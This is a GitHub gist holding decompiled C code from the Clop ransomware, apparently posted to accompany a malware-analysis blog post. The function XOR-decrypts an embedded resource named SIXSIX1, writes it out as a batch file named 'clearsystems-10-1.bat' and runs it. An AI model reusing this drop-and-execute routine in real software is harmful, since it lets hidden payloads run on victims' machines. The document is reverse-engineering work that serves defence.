decompiled / reverse-engineered Clop deobfuscation of SIXSIX1 resource code
HINSTANCE LoadExecuteClearSystemsBatchFile() | |
{ | |
HMODULE hModule; // eax | |
HMODULE phModule; // ebx | |
HRSRC hRsrcSIXSIX1; // eax | |
HRSRC phRsrcSIXSIX1; // esi | |
HGLOBAL hGlobalRsrcSIXSIX1; // eax | |
const void *ResourceLock; // edi | |
DWORD cbResourceSIXSIX1; // esi | |
HGLOBAL hDecryptedResourceMemory; // ebx | |
DWORD pcbResourceSIXSIX1; // edi | |
DWORD i; // esi | |
HANDLE hDecryptedFile; // esi | |
DWORD NumberOfBytesWritten; // [esp+Ch] [ebp-214h] | |
DWORD nNumberOfBytesToWrite; // [esp+10h] [ebp-210h] | |
CHAR currentPath; // [esp+14h] [ebp-20Ch] | |
CHAR FileName; // [esp+118h] [ebp-108h] | |
hModule = GetModuleHandleW(0); | |
phModule = hModule; | |
hRsrcSIXSIX1 = FindResourceW(hModule, (LPCWSTR)0xF447, L"SIXSIX1"); | |
phRsrcSIXSIX1 = hRsrcSIXSIX1; | |
hGlobalRsrcSIXSIX1 = LoadResource(phModule, hRsrcSIXSIX1); | |
ResourceLock = LockResource(hGlobalRsrcSIXSIX1); | |
cbResourceSIXSIX1 = SizeofResource(phModule, phRsrcSIXSIX1); | |
nNumberOfBytesToWrite = cbResourceSIXSIX1; | |
hDecryptedResourceMemory = GlobalAlloc(GMEM_ZEROINIT, cbResourceSIXSIX1); | |
memmove(hDecryptedResourceMemory, ResourceLock, cbResourceSIXSIX1); | |
pcbResourceSIXSIX1 = cbResourceSIXSIX1; | |
for ( i = 0; i < pcbResourceSIXSIX1; ++i ) | |
*((_BYTE *)hDecryptedResourceMemory + i) ^= charArrMagicStr[i % 0x42]; | |
GetCurrentDirectoryA(260u, ¤tPath); | |
wsprintfA(&FileName, "%s\\clearsystems-10-1.bat", ¤tPath); | |
NumberOfBytesWritten = 0; | |
hDecryptedFile = CreateFileA(&FileName, 0x40000000u, 2u, 0, 4u, 0x80u, 0); | |
if ( hDecryptedFile != (HANDLE)-1 ) | |
{ | |
WriteFile(hDecryptedFile, hDecryptedResourceMemory, pcbResourceSIXSIX1, &NumberOfBytesWritten, 0); | |
CloseHandle(hDecryptedFile); | |
} | |
GlobalFree(hDecryptedResourceMemory); | |
return ShellExecuteA(0, "open", &FileName, 0, 0, 0); | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
This comment has been minimized.
For blog post: https://laserkittens.com/ransomware-sucks/